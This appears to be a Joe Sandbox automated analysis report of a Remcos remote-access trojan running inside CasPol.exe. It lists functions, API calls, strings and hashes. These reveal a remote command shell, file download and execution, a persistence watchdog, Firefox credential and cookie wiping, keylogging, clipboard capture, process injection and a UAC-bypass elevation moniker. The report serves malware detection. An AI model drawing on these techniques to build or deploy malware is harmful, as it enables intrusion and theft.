                                                                                                              • Opcode ID: d60c3e2bfe9cc093b3110c1e14b53e816b2a5bac2969881e56f7ec686a65f544
                                                                                                              • Instruction ID: 6f7a2b722a2a1d8c8194c8cb68bd8fc2eac5a8381c6f9e3e6965fab01942ac9c
                                                                                                              • Opcode Fuzzy Hash: d60c3e2bfe9cc093b3110c1e14b53e816b2a5bac2969881e56f7ec686a65f544
                                                                                                              • Instruction Fuzzy Hash: 8A110233A041629BFB329F68EC4099B7395AB803747164672FD19AB344DB34EC4386E9
                                                                                                              Function 00437ECF Relevance: 3.0, APIs: 2, Instructions: 19COMMON
                                                                                                              Download Yara Rule

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 312 437ecf-437ed4 call 438e57 314 437ed9-437ee2 312->314 315 437ee7-437ef6 call 438f08 314->315 316 437ee4-437ee6 314->316 319 437ef8-437efd call 437f02 315->319 320 437eff-437f01 315->320 319->316
                                                                                                              APIs
                                                                                                                • Part of subcall function 00438E57: try_get_function.LIBVCRUNTIME ref: 00438E6C
                                                                                                              • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00437EED
                                                                                                              • ___vcrt_uninitialize_ptd.LIBVCRUNTIME ref: 00437EF8
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000022.00000002.585780717.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_34_2_400000_CasPol.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: Value___vcrt____vcrt_uninitialize_ptdtry_get_function
                                                                                                              • String ID:
                                                                                                              • API String ID: 806969131-0
                                                                                                              • Opcode ID: b143fc5c6894dc50f93e5526221a244408d4657bcec4ada42a0f1b5aca1b3c68
                                                                                                              • Instruction ID: ae9b6128b1ea9ffe86f5afd704093ee73625e806026b45b402e8089d921c29d6
                                                                                                              • Opcode Fuzzy Hash: b143fc5c6894dc50f93e5526221a244408d4657bcec4ada42a0f1b5aca1b3c68
                                                                                                              • Instruction Fuzzy Hash: E1D0A7F101C3805C9D2062752C036561344A809B78FB036CFF174D5DC1EE2D8840A41E
                                                                                                              Function 00448706 Relevance: 1.5, APIs: 1, Instructions: 39memoryCOMMONLIBRARYCODE
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • RtlAllocateHeap.NTDLL(00000008,?,00000000,?,00446F74,00000001,00000364,?,0043A846,00000000,00000000,00000000,00000000,00000000,00000000,00402C08), ref: 00448747
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000022.00000002.585780717.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_34_2_400000_CasPol.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: AllocateHeap
                                                                                                              • String ID:
                                                                                                              • API String ID: 1279760036-0
                                                                                                              • Opcode ID: de2f67f7923a31b36d9b5f834b48d2b0e0f5da7a677d300afd471130a21967f0
                                                                                                              • Instruction ID: 09342868e9f2d6cc7f7b696f5049c05c0568eaa44df27644d65b9450949fa691
                                                                                                              • Opcode Fuzzy Hash: de2f67f7923a31b36d9b5f834b48d2b0e0f5da7a677d300afd471130a21967f0
                                                                                                              • Instruction Fuzzy Hash: 9CF0E93250412467BB216A369D55B5F7748AF427B0B34802BFC08EA691DF68DD4182ED
                                                                                                              Function 00446AFF Relevance: 1.5, APIs: 1, Instructions: 32memoryCOMMONLIBRARYCODE
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • RtlAllocateHeap.NTDLL(00000000,00434423,?,?,00437227,?,?,00000000,00475B70,?,0040CC87,00434423,?,?,?,?), ref: 00446B31
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000022.00000002.585780717.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_34_2_400000_CasPol.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: AllocateHeap
                                                                                                              • String ID:
                                                                                                              • API String ID: 1279760036-0
                                                                                                              • Opcode ID: dc6ea950822f8571e228d4b4fa6025b1dc9324ca9cf531c4426aa18bd07b2452
                                                                                                              • Instruction ID: 23017b4f7b15ec8d1e6c8205d578d5100ba2a3a3bb6c043e3f5ab96588fe2cc9
                                                                                                              • Opcode Fuzzy Hash: dc6ea950822f8571e228d4b4fa6025b1dc9324ca9cf531c4426aa18bd07b2452
                                                                                                              • Instruction Fuzzy Hash: 16E0E5312002B556FB202A6A9C05F5B7A88DB437A4F160133AC09D62D0CF5CEC4181AF

                                                                                                              Non-executed Functions

                                                                                                              Function 00406F06 Relevance: 46.3, APIs: 10, Strings: 16, Instructions: 849filesleepCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • SetEvent.KERNEL32(?,?), ref: 00406F28
                                                                                                              • GetFileAttributesW.KERNEL32(00000000,00000000,00000000), ref: 00406FF8
                                                                                                              • DeleteFileW.KERNEL32(00000000), ref: 00407018
                                                                                                                • Part of subcall function 0041B42F: FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,?,00473EE8,00000000), ref: 0041B489
                                                                                                                • Part of subcall function 0041B42F: FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,?,00473EE8,00000000), ref: 0041B4BB
                                                                                                                • Part of subcall function 0041B42F: RemoveDirectoryW.KERNEL32(?,?,?,?,?,?,?,00473EE8,00000000), ref: 0041B50C
                                                                                                                • Part of subcall function 0041B42F: FindClose.KERNEL32(00000000,?,?,?,?,?,?,00473EE8,00000000), ref: 0041B561
                                                                                                                • Part of subcall function 0041B42F: RemoveDirectoryW.KERNEL32(00000000,?,?,?,?,?,?,00473EE8,00000000), ref: 0041B568
                                                                                                                • Part of subcall function 00404468: send.WS2_32(?,00000000,00000000,00000000), ref: 004044FD
                                                                                                                • Part of subcall function 00406BE9: CreateFileW.KERNEL32(00000000,00000004,00000000,00000000,00000002,00000080,00000000), ref: 00406C38
                                                                                                                • Part of subcall function 00406BE9: WriteFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 00406C80
                                                                                                                • Part of subcall function 00406BE9: CloseHandle.KERNEL32(00000000), ref: 00406CC0
                                                                                                                • Part of subcall function 00406BE9: MoveFileW.KERNEL32 ref: 00406CDD
                                                                                                                • Part of subcall function 0041A686: GetLocalTime.KERNEL32(00000000), ref: 0041A6A0
                                                                                                                • Part of subcall function 00404468: WaitForSingleObject.KERNEL32(?,00000000,00401943,?,?,00000004,?,?,00000004,00475B70,00473EE8,00000000), ref: 0040450E
                                                                                                                • Part of subcall function 00404468: SetEvent.KERNEL32(?,?,?,00000004,?,?,00000004,00475B70,00473EE8,00000000,?,?,?,?,?,00401943), ref: 0040453C
                                                                                                              • ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000001), ref: 00407416
                                                                                                              • GetLogicalDriveStringsA.KERNEL32 ref: 004074F5
                                                                                                              • SetFileAttributesW.KERNEL32(00000000,?,00000000,00000001), ref: 0040773A
                                                                                                              • DeleteFileA.KERNEL32(?), ref: 004078CC
                                                                                                                • Part of subcall function 00407A8C: __EH_prolog.LIBCMT ref: 00407A91
                                                                                                                • Part of subcall function 00407A8C: FindFirstFileW.KERNEL32(00000000,?,00465AA0,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00407B4A
                                                                                                                • Part of subcall function 00407A8C: FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00407B6E
                                                                                                              • Sleep.KERNEL32(000007D0), ref: 00407976
                                                                                                              • StrToIntA.SHLWAPI(00000000), ref: 004079BA
                                                                                                                • Part of subcall function 0041BB77: SystemParametersInfoW.USER32(00000014,00000000,00000000,00000003), ref: 0041BC6C
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000022.00000002.585780717.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_34_2_400000_CasPol.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: File$Find$AttributesCloseDeleteDirectoryEventFirstNextRemove$CreateDriveExecuteH_prologHandleInfoLocalLogicalMoveObjectParametersShellSingleSleepStringsSystemTimeWaitWritesend
                                                                                                              • String ID: Browsing directory: $Deleted file: $Downloaded file: $Downloading file: $Executing file: $Failed to download file: $H@G$Unable to delete: $Unable to rename file!$V>G$open$x@G$x@G$x@G$x@G$>G
                                                                                                              • API String ID: 2918587301-599666313
                                                                                                              • Opcode ID: fe774ec57ea4c9c98434e9a8a4b205946b127d152570ca2712e415059fb31443
                                                                                                              • Instruction ID: 8a4068a2e00c67808ff4e441dc576a613f01372a1abbdcb91e63f440e0dcd641
                                                                                                              • Opcode Fuzzy Hash: fe774ec57ea4c9c98434e9a8a4b205946b127d152570ca2712e415059fb31443
                                                                                                              • Instruction Fuzzy Hash: 60429371A043005BC614F776C8979AE77A99F90718F40493FF946731E2EE3CAA09C69B
                                                                                                              Function 00405042 Relevance: 38.8, APIs: 15, Strings: 7, Instructions: 280pipesleepfileCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • __Init_thread_footer.LIBCMT ref: 0040508E
                                                                                                                • Part of subcall function 004334CF: EnterCriticalSection.KERNEL32(00470D18,00475BF0,?,004017C1,00475BF0,00000000), ref: 004334D9
                                                                                                                • Part of subcall function 004334CF: LeaveCriticalSection.KERNEL32(00470D18,?,004017C1,00475BF0,00000000), ref: 0043350C
                                                                                                                • Part of subcall function 00404468: send.WS2_32(?,00000000,00000000,00000000), ref: 004044FD
                                                                                                              • __Init_thread_footer.LIBCMT ref: 004050CB
                                                                                                              • CreatePipe.KERNEL32(00475CEC,00475CD4,00475BF8,00000000,0046556C,00000000), ref: 0040515E
                                                                                                              • CreatePipe.KERNEL32(00475CD8,00475CF4,00475BF8,00000000), ref: 00405174
                                                                                                              • CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000001,00000000,00000000,00000000,00475C08,00475CDC), ref: 004051E7
                                                                                                                • Part of subcall function 00433519: EnterCriticalSection.KERNEL32(00470D18,00475B70,00475BF0,?,0040179E,00475BF0), ref: 00433524
                                                                                                                • Part of subcall function 00433519: LeaveCriticalSection.KERNEL32(00470D18,?,0040179E,00475BF0), ref: 00433561
                                                                                                              • Sleep.KERNEL32(0000012C,00000093,?), ref: 0040523F
                                                                                                              • PeekNamedPipe.KERNEL32 ref: 00405264
                                                                                                              • ReadFile.KERNEL32(00000000,?,?,00000000), ref: 00405291
                                                                                                                • Part of subcall function 004338A5: __onexit.LIBCMT ref: 004338AB
                                                                                                              • WriteFile.KERNEL32(00000000,00000000,?,00000000,00473F98), ref: 0040538E
                                                                                                              • Sleep.KERNEL32(00000064,00000062,00465554), ref: 004053A8
                                                                                                              • TerminateProcess.KERNEL32(00000000), ref: 004053C1
                                                                                                              • CloseHandle.KERNEL32 ref: 004053CD
                                                                                                              • CloseHandle.KERNEL32 ref: 004053D5
                                                                                                              • CloseHandle.KERNEL32 ref: 004053E7
                                                                                                              • CloseHandle.KERNEL32 ref: 004053EF
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000022.00000002.585780717.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_34_2_400000_CasPol.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: CloseCriticalHandleSection$CreatePipe$EnterFileInit_thread_footerLeaveProcessSleep$NamedPeekReadTerminateWrite__onexitsend
                                                                                                              • String ID: P\G$P\G$P\G$P\G$P\G$SystemDrive$cmd.exe
                                                                                                              • API String ID: 3815868655-81343324
                                                                                                              • Opcode ID: 347f2c88b3c2668be74fabae2308f42da89957fbc9a464020775b19edc51cc58
                                                                                                              • Instruction ID: b18bac6d60c4c725a58799f80733fb47b3e4e6a61b1262bf76379e9ec18ff918
                                                                                                              • Opcode Fuzzy Hash: 347f2c88b3c2668be74fabae2308f42da89957fbc9a464020775b19edc51cc58
                                                                                                              • Instruction Fuzzy Hash: A691E5716007056FD705BB65AC41A6F37A8EB80348F50403FF94ABA1E2EEBC9C448B6D
                                                                                                              Function 00410F36 Relevance: 33.5, APIs: 7, Strings: 12, Instructions: 238threadCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • GetCurrentProcessId.KERNEL32 ref: 00410F45
                                                                                                                • Part of subcall function 004127D5: RegCreateKeyA.ADVAPI32(80000001,00000000,TUF), ref: 004127E3
                                                                                                                • Part of subcall function 004127D5: RegSetValueExA.ADVAPI32(TUF,000000AF,00000000,00000004,00000001,00000004), ref: 004127FE
                                                                                                                • Part of subcall function 004127D5: RegCloseKey.ADVAPI32(?), ref: 00412809
                                                                                                              • OpenMutexA.KERNEL32 ref: 00410F81
                                                                                                              • CreateThread.KERNEL32(00000000,00000000,00411637,00000000,00000000,00000000), ref: 00410FE6
                                                                                                                • Part of subcall function 004124B7: RegOpenKeyExA.ADVAPI32(80000001,00000000,00000000,00020019,00000000), ref: 004124D7
                                                                                                                • Part of subcall function 004124B7: RegQueryValueExA.ADVAPI32 ref: 004124F5
                                                                                                                • Part of subcall function 004124B7: RegCloseKey.ADVAPI32(00000000), ref: 00412500
                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 00410F90
                                                                                                                • Part of subcall function 0041A686: GetLocalTime.KERNEL32(00000000), ref: 0041A6A0
                                                                                                              • OpenProcess.KERNEL32(001FFFFF,00000000,?), ref: 0041125A
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000022.00000002.585780717.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_34_2_400000_CasPol.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: CloseOpen$CreateProcessValue$CurrentHandleLocalMutexQueryThreadTime
                                                                                                              • String ID: 0DG$Remcos restarted by watchdog!$WDH$Watchdog launch failed!$Watchdog module activated$WinDir$\SysWOW64\$\system32\$fsutil.exe$rmclient.exe$svchost.exe$BG
                                                                                                              • API String ID: 65172268-860466531
                                                                                                              • Opcode ID: c59a9ba99b2cc187f19442751e4719393b3c5f539a1bb9958299626df8d8cbdd
                                                                                                              • Instruction ID: 2ec41641ff7d981187ed77e29e7d519fc89a207972baa733902a05010441332b
                                                                                                              • Opcode Fuzzy Hash: c59a9ba99b2cc187f19442751e4719393b3c5f539a1bb9958299626df8d8cbdd
                                                                                                              • Instruction Fuzzy Hash: 97719E3160420157C614FB32D8579AE77A8AED4718F40053FF582A21F2EF7CAA49869F
                                                                                                              Function 0040B335 Relevance: 24.6, APIs: 8, Strings: 6, Instructions: 145fileCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • FindFirstFileA.KERNEL32(00000000,?,00000000,\AppData\Roaming\Mozilla\Firefox\Profiles\), ref: 0040B3B4
                                                                                                              • FindClose.KERNEL32(00000000), ref: 0040B3CE
                                                                                                              • FindNextFileA.KERNEL32(00000000,?), ref: 0040B4F1
                                                                                                              • FindClose.KERNEL32(00000000), ref: 0040B517
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000022.00000002.585780717.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_34_2_400000_CasPol.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: Find$CloseFile$FirstNext
                                                                                                              • String ID: [Firefox StoredLogins Cleared!]$[Firefox StoredLogins not found]$UserProfile$\AppData\Roaming\Mozilla\Firefox\Profiles\$\key3.db$\logins.json
                                                                                                              • API String ID: 1164774033-3681987949
                                                                                                              • Opcode ID: 012abd7bd482f24294ec220c5f3416e7c12077f4aefc2c6d47742caa5bc96ad8
                                                                                                              • Instruction ID: 89bba1744b34cafda07904381260291e44814ca984bf7dbd554ee600cd7873bd
                                                                                                              • Opcode Fuzzy Hash: 012abd7bd482f24294ec220c5f3416e7c12077f4aefc2c6d47742caa5bc96ad8
                                                                                                              • Instruction Fuzzy Hash: 4D512C319042195ADB14FBA1EC96AEE7768EF50318F50007FF805B31E2EF389A45CA9D
                                                                                                              Function 0040B53A Relevance: 21.1, APIs: 7, Strings: 5, Instructions: 130fileCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • FindFirstFileA.KERNEL32(00000000,?,00000000,\AppData\Roaming\Mozilla\Firefox\Profiles\), ref: 0040B5B2
                                                                                                              • FindClose.KERNEL32(00000000), ref: 0040B5CC
                                                                                                              • FindNextFileA.KERNEL32(00000000,?), ref: 0040B68C
                                                                                                              • FindClose.KERNEL32(00000000), ref: 0040B6B2
                                                                                                              • FindClose.KERNEL32(00000000), ref: 0040B6D1
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000022.00000002.585780717.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_34_2_400000_CasPol.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: Find$Close$File$FirstNext
                                                                                                              • String ID: [Firefox Cookies not found]$[Firefox cookies found, cleared!]$UserProfile$\AppData\Roaming\Mozilla\Firefox\Profiles\$\cookies.sqlite
                                                                                                              • API String ID: 3527384056-432212279
                                                                                                              • Opcode ID: eec28e5122cf95747afd0231d26089d1190572cbd646818cfb2ab67d48c7021b
                                                                                                              • Instruction ID: 41d59f58487c11b5b23c2ebc8e3123b77d6604a8f5f59a85184e8f88ff1ca84c
                                                                                                              • Opcode Fuzzy Hash: eec28e5122cf95747afd0231d26089d1190572cbd646818cfb2ab67d48c7021b
                                                                                                              • Instruction Fuzzy Hash: 65413A319042196ACB14F7A1EC569EE7768EE21318F50017FF801B31E2EF399A458A9E
                                                                                                              Function 0040E219 Relevance: 19.5, APIs: 6, Strings: 5, Instructions: 212processCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • GetModuleFileNameW.KERNEL32(00000000,?,00000104,00000000,?,?,00474358), ref: 0040E233
                                                                                                              • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0040E25E
                                                                                                              • Process32FirstW.KERNEL32(00000000,0000022C), ref: 0040E27A
                                                                                                              • Process32NextW.KERNEL32(00000000,0000022C), ref: 0040E2FD
                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 0040E30C
                                                                                                                • Part of subcall function 004127D5: RegCreateKeyA.ADVAPI32(80000001,00000000,TUF), ref: 004127E3
                                                                                                                • Part of subcall function 004127D5: RegSetValueExA.ADVAPI32(TUF,000000AF,00000000,00000004,00000001,00000004), ref: 004127FE
                                                                                                                • Part of subcall function 004127D5: RegCloseKey.ADVAPI32(?), ref: 00412809
                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 0040E371
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000022.00000002.585780717.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_34_2_400000_CasPol.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: Close$CreateHandleProcess32$FileFirstModuleNameNextSnapshotToolhelp32Value
                                                                                                              • String ID: C:\Program Files(x86)\Internet Explorer\$Inj$ieinstal.exe$ielowutil.exe$BG
                                                                                                              • API String ID: 726551946-3025026198
                                                                                                              • Opcode ID: 2298112d5e9beca4c64cadb89c7e546d0899f31810f4b1b50fdabc55d78eae7e
                                                                                                              • Instruction ID: ae31f71cb8b9f969ca9e83e5ca698076ed3bac053ed440982de07d1dc4d90588
                                                                                                              • Opcode Fuzzy Hash: 2298112d5e9beca4c64cadb89c7e546d0899f31810f4b1b50fdabc55d78eae7e
                                                                                                              • Instruction Fuzzy Hash: ED7172311083019BC714FB61D8519EF77A5BF91358F400D3EF986631E2EF38A959CA9A
                                                                                                              Function 004159C6 Relevance: 18.1, APIs: 12, Instructions: 80clipboardmemoryCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • OpenClipboard.USER32 ref: 004159C7
                                                                                                              • EmptyClipboard.USER32 ref: 004159D5
                                                                                                              • GlobalAlloc.KERNEL32(00002000,-00000002), ref: 004159F5
                                                                                                              • GlobalLock.KERNEL32(00000000), ref: 004159FE
                                                                                                              • GlobalUnlock.KERNEL32(00000000), ref: 00415A34
                                                                                                              • SetClipboardData.USER32(0000000D,00000000), ref: 00415A3D
                                                                                                              • CloseClipboard.USER32 ref: 00415A5A
                                                                                                              • OpenClipboard.USER32 ref: 00415A61
                                                                                                              • GetClipboardData.USER32 ref: 00415A71
                                                                                                              • GlobalLock.KERNEL32(00000000), ref: 00415A7A
                                                                                                              • GlobalUnlock.KERNEL32(00000000), ref: 00415A83
                                                                                                              • CloseClipboard.USER32 ref: 00415A89
                                                                                                                • Part of subcall function 00404468: send.WS2_32(?,00000000,00000000,00000000), ref: 004044FD
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000022.00000002.585780717.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_34_2_400000_CasPol.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: Clipboard$Global$CloseDataLockOpenUnlock$AllocEmptysend
                                                                                                              • String ID:
                                                                                                              • API String ID: 3520204547-0
                                                                                                              • Opcode ID: 5bf6c0a188ebc9cd77caef7c6d8a55023eea9b799c8747cd0bf31199529283f8
                                                                                                              • Instruction ID: b8e523df9fc7c7245f85f50a48877f09888e29e8b5459684195c928b546a98bf
                                                                                                              • Opcode Fuzzy Hash: 5bf6c0a188ebc9cd77caef7c6d8a55023eea9b799c8747cd0bf31199529283f8
                                                                                                              • Instruction Fuzzy Hash: E02183712043009BC714BBB1EC5AAAE76A9AF80752F00453EFD06961E2EF38C845D66A
                                                                                                              Function 00418754 Relevance: 15.9, APIs: 1, Strings: 8, Instructions: 197COMMON
                                                                                                              Download Yara Rule
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000022.00000002.585780717.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_34_2_400000_CasPol.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: 0$1$2$3$4$5$6$7
                                                                                                              • API String ID: 0-3177665633
                                                                                                              • Opcode ID: cde1b3d257b3b84ac0aca3a867a652d949c29c2e455d7912b36e5a4a136b74f3
                                                                                                              • Instruction ID: 2879f211a781d1662389055333b9a248a4bc7621c6500268a6892da51c348380
                                                                                                              • Opcode Fuzzy Hash: cde1b3d257b3b84ac0aca3a867a652d949c29c2e455d7912b36e5a4a136b74f3
                                                                                                              • Instruction Fuzzy Hash: CC61A370508301AEDB00EF21D862FEA77E4AF85754F40485EFA91672E1DF789A48C797
                                                                                                              Function 00409B10 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 108keyboardthreadCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000022.00000002.585780717.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_34_2_400000_CasPol.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: Unicode$KeyboardStateWindow$ForegroundLayoutProcessThread
                                                                                                              • String ID: 8[G
                                                                                                              • API String ID: 1888522110-1691237782
                                                                                                              • Opcode ID: 0057a6b8e9be89c2a124ace2c7aa15ce6e2280d77a8450e2501583d43799386c
                                                                                                              • Instruction ID: f24a8317de74a0bbad47f265c67a45df51816e9018bfad09e00086f3728f1c27
                                                                                                              • Opcode Fuzzy Hash: 0057a6b8e9be89c2a124ace2c7aa15ce6e2280d77a8450e2501583d43799386c
                                                                                                              • Instruction Fuzzy Hash: EE318172508309AFD700DF90DC85FDBB7ECEB48715F00083ABA45961A1D6B5E948DB96
                                                                                                              Function 00406764 Relevance: 15.8, APIs: 2, Strings: 7, Instructions: 55COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • _wcslen.LIBCMT ref: 00406788
                                                                                                              • CoGetObject.OLE32(?,00000024,004659B0,00000000), ref: 004067E9
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000022.00000002.585780717.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_34_2_400000_CasPol.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: Object_wcslen
                                                                                                              • String ID: $$Elevation:Administrator!new:$[+] CoGetObject$[+] CoGetObject SUCCESS$[+] ucmAllocateElevatedObject$[-] CoGetObject FAILURE${3E5FC7F9-9A51-4367-9063-A120244FBEC7}
                                                                                                              • API String ID: 240030777-3166923314
                                                                                                              • Opcode ID: db32128b02a1ccbc70c4588b7822f6c775a314ba91b6364ff21a4127614396bf
                                                                                                              • Instruction ID: dba8c49f7cecafb8ed31af17d29d910bb03d3c12ecd117c8e18c4d6c9c114880
                                                                                                              • Opcode Fuzzy Hash: db32128b02a1ccbc70c4588b7822f6c775a314ba91b6364ff21a4127614396bf
                                                                                                              • Instruction Fuzzy Hash: 811170B2901118AEDB10FAA5884AA9EB7BCDB48714F55007FE905F3281E7789A148A7D
                                                                                                              Function 004198C2 Relevance: 15.2, APIs: 10, Instructions: 228serviceCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • OpenSCManagerA.ADVAPI32(00000000,00000000,00000004,004748F8), ref: 004198D8
                                                                                                              • EnumServicesStatusW.ADVAPI32(00000000,0000003B,00000003,?,00000000,?,?,?), ref: 00419927
                                                                                                              • GetLastError.KERNEL32 ref: 00419935
                                                                                                              • EnumServicesStatusW.ADVAPI32(00000000,0000003B,00000003,00000000,?,?,?,?), ref: 0041996D
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000022.00000002.585780717.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_34_2_400000_CasPol.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: EnumServicesStatus$ErrorLastManagerOpen
                                                                                                              • String ID:
                                                                                                              • API String ID: 3587775597-0
                                                                                                              • Opcode ID: 34920957428d69c8760f99d8606d88bdea0f5fd358a953c5030324d0b209bf69
                                                                                                              • Instruction ID: 5304d2aa3016a1bb8b693e548c532b43deb082133906afc562c92feca393f19d
                                                                                                              • Opcode Fuzzy Hash: 34920957428d69c8760f99d8606d88bdea0f5fd358a953c5030324d0b209bf69
                                                                                                              • Instruction Fuzzy Hash: 37812F711083049BC614FB21DC959AFB7A8BF94718F50493EF582521E2EF78AA05CB9A
                                                                                                              Function 004513B7 Relevance: 14.2, APIs: 5, Strings: 3, Instructions: 188COMMONLIBRARYCODE
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                                • Part of subcall function 00446EBF: GetLastError.KERNEL32(?,?,0043931C,?,?,?,0043E4CD,?,?,?,?,00000000,?,?,0042CE53,0000003B), ref: 00446EC3
                                                                                                                • Part of subcall function 00446EBF: _free.LIBCMT ref: 00446EF6
                                                                                                                • Part of subcall function 00446EBF: SetLastError.KERNEL32(00000000,0043E4CD,?,?,?,?,00000000,?,?,0042CE53,0000003B,?,00000041,00000000,00000000), ref: 00446F37
                                                                                                                • Part of subcall function 00446EBF: _abort.LIBCMT ref: 00446F3D
                                                                                                                • Part of subcall function 00446EBF: _free.LIBCMT ref: 00446F1E
                                                                                                                • Part of subcall function 00446EBF: SetLastError.KERNEL32(00000000,0043E4CD,?,?,?,?,00000000,?,?,0042CE53,0000003B,?,00000041,00000000,00000000), ref: 00446F2B
                                                                                                              • GetUserDefaultLCID.KERNEL32(?,?,?), ref: 004514C3
                                                                                                              • IsValidCodePage.KERNEL32(00000000), ref: 0045151E
                                                                                                              • IsValidLocale.KERNEL32(?,00000001), ref: 0045152D
                                                                                                              • GetLocaleInfoW.KERNEL32(?,00001001,<D,00000040,?,?,00000055,00000000,?,?,00000055,00000000), ref: 00451575
                                                                                                              • GetLocaleInfoW.KERNEL32(?,00001002,00000000,00000040), ref: 00451594
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000022.00000002.585780717.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_34_2_400000_CasPol.jbxd
